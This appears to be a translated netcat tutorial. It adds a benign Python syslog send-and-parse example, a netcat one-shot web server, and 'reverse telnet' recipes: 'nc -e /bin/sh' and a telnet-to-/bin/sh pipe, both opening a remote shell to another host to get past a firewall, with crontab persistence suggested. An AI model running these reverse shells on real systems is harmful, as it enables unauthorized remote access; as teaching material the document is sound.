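What that line puts on the wire, as an added example that is not from the original post: a syslog datagram is just '<PRI>text' over UDP, where PRI = facility * 8 + severity, so <38> is auth.info. The code builds and parses that header and round-trips one message through a loopback UDP socket standing in for loggerhost (a constructed stand-in bound to an ephemeral port rather than 514). The function names are my own; the facility and severity tables are the RFC 3164 numbering.

```python
import socket

# RFC 3164 facility and severity codes, in numeric order.
FACILITIES = ["kern", "user", "mail", "daemon", "auth", "syslog", "lpr", "news",
              "uucp", "cron", "authpriv", "ftp", "ntp", "audit", "alert", "clock",
              "local0", "local1", "local2", "local3", "local4", "local5", "local6", "local7"]
SEVERITIES = ["emerg", "alert", "crit", "err", "warning", "notice", "info", "debug"]


def encode_pri(facility, severity):
    """PRI = facility * 8 + severity, so auth.info is <38>: 4 * 8 + 6."""
    return f"<{FACILITIES.index(facility) * 8 + SEVERITIES.index(severity)}>"


def decode(datagram):
    """Split '<PRI>message' into (facility, severity, message); bad PRI -> None."""
    text = datagram.decode("utf-8", errors="replace")
    if not text.startswith("<"):
        return None
    end = text.find(">")
    if end < 1 or not text[1:end].isdigit():
        return None
    pri = int(text[1:end])
    if pri > 191:                          # 23 * 8 + 7 is the largest valid PRI
        return None
    return FACILITIES[pri // 8], SEVERITIES[pri % 8], text[end + 1:]


def send_syslog(host, port, facility, severity, message):
    """Equivalent of: echo '<PRI>message' | nc -w 1 -u host port"""
    payload = (encode_pri(facility, severity) + message).encode()
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.sendto(payload, (host, port))    # fire and forget: UDP gives no ack
    return payload


def receive_one(sock, timeout=2.0):
    """Read one datagram from a bound UDP socket and parse it."""
    sock.settimeout(timeout)
    data, _ = sock.recvfrom(2048)
    return decode(data)


def demo():
    """Round trip through a constructed loopback 'loggerhost' on an
    ephemeral port, standing in for a real syslog daemon on UDP 514."""
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as logger:
        logger.bind(("127.0.0.1", 0))
        port = logger.getsockname()[1]
        send_syslog("127.0.0.1", port, "auth", "info", "message")
        return receive_one(logger)


if __name__ == "__main__":
    print(demo())
```

Because this is UDP, nc -u cannot tell whether anything received the datagram (the -w 1 only bounds how long nc waits before exiting), and a syslog daemon listening on UDP 514 believes whatever facility, severity and hostname the sender writes into the packet. Keep that in mind before treating remote syslog as an audit trail.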

Throwaway web server
/* The throwaway web server comes from http://security.kaist.ac.kr/docs/netcat.html */
nc can also be used as a simple web server.

nc -l -p [port] -e [filename]

/* test.c */
#include <stdio.h>

int main(void)
{
    getchar();                  /* read one byte of the request... */
    printf("haha\n");           /* ...and answer down the connection */
    return 0;
}

nc -l -p 1234 -e test

Reverse telnet

First consider this situation. Server A can connect anywhere. Server B cannot
connect to A because of a firewall. The technique used in this case is called
reverse telnet: A connects to B, yet the commands are issued from B.
Put it in a crontab and it becomes quite useful.

Setup on server B

$ nc -l -p 1234

Setup on server A
$ nc -e /bin/sh <address of B> 1234

Commands can now be issued from B.

$ nc -l -p 1234
ls <-- command typed by the user
Desktop
Mail
collect.data
dead.letter
epcs2.c
face2.gif
face_.gif
html.tgz

When you are up to it, be sure to read the netcat Readme.


// The Reverse Telnet part is included as a tip

// The source is Oprix, of course

Above, reverse telnet was built from nc's basic features. But what if the other side has no Netcat?

What do you do then? Those of you who only read the lectures, leave a post on the BBS. s[ㅡヘㅡ]z

First read the nc material above carefully, try it, and then try this.

A connects to B, and B issues commands to A.

A(211.211.211.211) --------> B (211.211.211.212)

On B, open two windows and start two instances of nc.

First window
$ nc -l -p 3456

Second window
$ nc -l -p 7890

With those in place,

run this on A:

$ telnet 211.211.211.212 3456 | /bin/sh |telnet 211.211.211.212 7890

Then

type ls in B's first window. Nothing appears there. ^^

Now look at B's second window: the output shows up there.

Neat, isn't it? ^^

Think carefully about the pipes to see why this happens: the first telnet's standard output (what B types on 3456) becomes the shell's standard input, and the shell's standard output is fed to the second telnet, which carries it back to B on 7890.

This article may be used anywhere provided you credit the source (http://security.xmecca.com).
